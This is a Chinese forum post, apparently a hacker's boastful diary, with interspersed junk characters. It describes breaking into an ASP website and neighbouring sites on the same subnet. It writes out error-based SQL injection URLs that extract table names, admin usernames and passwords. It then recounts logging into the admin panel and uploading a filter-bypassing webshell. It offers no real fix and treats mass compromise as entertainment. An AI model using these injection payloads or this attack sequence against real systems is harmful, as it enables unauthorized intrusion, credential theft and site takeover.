发现一个注入点
& D; x3 f: u n5 P9 H; Ghttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389: J5 Q1 d$ t- g' j
$ u" m/ [( t$ F$ O8 _: h" ?
习惯性的加’having1=1--% K% J2 n c K! H d9 U
9 Z7 ~7 m- `) G% b; u0 {2 K8 shttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—2 o. K* J& g5 Z: s
- x" |. y% H% D s5 D8 n. u( N0
% ?% I+ Y9 G$ a; J# p
+ p( s0 X! x$ e) P爆出Diary_A.dl_Title(这时候很激动啊)- K5 [0 k% P' C+ G+ _9 E4 t
% [+ I5 r: E& `; u+ ~
那么继续
4 |) e" l C: e, F7 k! ghttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—2 v' s5 z( r) f7 `: H: e& F
, g3 W9 G3 \- Y, q/ V9 _5 u继续,一直爆下去
$ B' x' J1 X$ c# b3 D6 n1 @0 c( p$ P/ @3 F+ {% _4 l9 {
爆到几个字段和表段 但是没找到需要的管理用户的字段6 h) O" Z- O6 J7 M4 x5 Z
, V" M' {! I5 d; `4 h) x
蛋疼了 怎么办 然后去后台登陆页看源码$ p% ~0 O7 t/ Z5 o/ F7 |- S
s O1 P' I b# j! O- B7 Z
0# F0 c3 _8 I8 j$ \2 K
! r v! w! @0 o* {
Input name= “ADUID”
& m3 ?; I, Z" S0 d8 J. g5 o6 I7 eInput name= “ADPWD”2 X/ x+ o- g3 z3 A8 E$ r; }, r
5 { a6 d' s0 }2 q' s# W
很幸运 找到了字段那就继续8 H2 i, I$ e* H# J! z8 E4 d
找到之后开始爆用户
! ~3 l# b+ s, Y- {http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
% x& z o; Y9 l7 C9 p6 x爆密码
6 b- m1 ~8 z$ O+ d; I* |- f) |. Jhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
9 \) _2 B) t9 f! i5 q3 D! e2 M测试了下 这个注入点只能爆到文章哪里的表 4 q& B9 o5 p+ @3 p( [
/ U0 l5 y* v# K; j8 o
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
: ]7 b/ t6 W8 m$ x' P: D
( E+ |+ n5 j1 E' n( l7 _4 k又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了4 }6 N0 K" a) T
8 p( q X3 X( y. x1 R) t473/ z! b! x0 v B8 ]
2 I n/ n( j7 `7 a& h) R# V
进后台
6 K1 U" G, }- d" t
9 f( l+ j/ v& ~" f+ b" t7 [6 O) t9 \# N# }. o
发现几个上传点 有的地方不能上传 而且防止恶意代码
- A& S1 o0 j3 H8 E1 w- p7 F4 P( \$ P0 `9 ~0 J" K. K/ `5 G- H
没办法 各种百度各种找大牛 找到一只好像可以突破的马. j, g" Y5 y8 E" t; t
3 x& }0 |# Y, C9 R. Q1 w0 A+ h' S
1 y4 ?, p9 b; D' T4 L3 c
在系统管理那里直接上传 不过没有显示地址
; e) _- p* V0 a) t; W+ J
' w5 D# ]+ O f% F再上传一次 抓包 搞定OK* y( ]* q/ L* B* y
6 p: P" l& d1 C' _+ H7 p- L
# w; R$ u7 [: O. s7 z" k- N2 ^6 L: @% B2 g* ~
4727 l7 Q8 K0 w( T" F' u
8 P, _$ }0 D5 K晚上不行了 去睡觉。。。4 ^: s G4 ~6 ^% \7 i- o( H
第二天刚起床 闲的没事做继续日站吧 ( g6 N* h$ }: K: n. n
& a% I, X! H9 W8 B
找个站 就把这个站的旁c扫了下1 v9 M1 I" E% ~2 P' {
, y7 k5 y6 I3 \2 j3 W8 I O
发现c段也有一个购物站 ,然后还和这个站的模板差不多
# @, X3 _! P. Y7 e. w
" B6 {* H3 `! D% w( E就找到会员登录口测试
# u/ A& {5 ^; C9 q3 q* y& l" [3 T( R4 }5 E* {
'and (select top 1 MGR_UID from A_MGR)>0—
# N( y+ e+ @; s) r% A- r1 S果断爆到了 这时候我很激动 通杀
5 p4 E4 Q, U1 w, N) a- [% @+ c( ]! Y* Y) L" n& g
再次翻c段2 l. l2 |/ p. J( M& q; [
( Q" {6 o* m0 U; F, f; D2 K
翻出几个站 都成功拿下6 z: B% h$ k/ C' G, d+ X
2 I; ]. I6 O3 K$ E0 D- s9 U0 P* d4 b3 d2 p
' X' K- q" ^" ~9 Y; L2 c% p
修复方案:: s6 Y+ ?' P6 u
他们比我专业
) h2 ]5 B# ~' p) z- G& I K9 X
3 r' X+ T1 s" a2 c6 m9 u- V- R3 p! K: A, U
4 p5 a2 Q4 w3 R2 E7 |
|
发表于 2013-4-4 17:40:38
收藏
支持
反对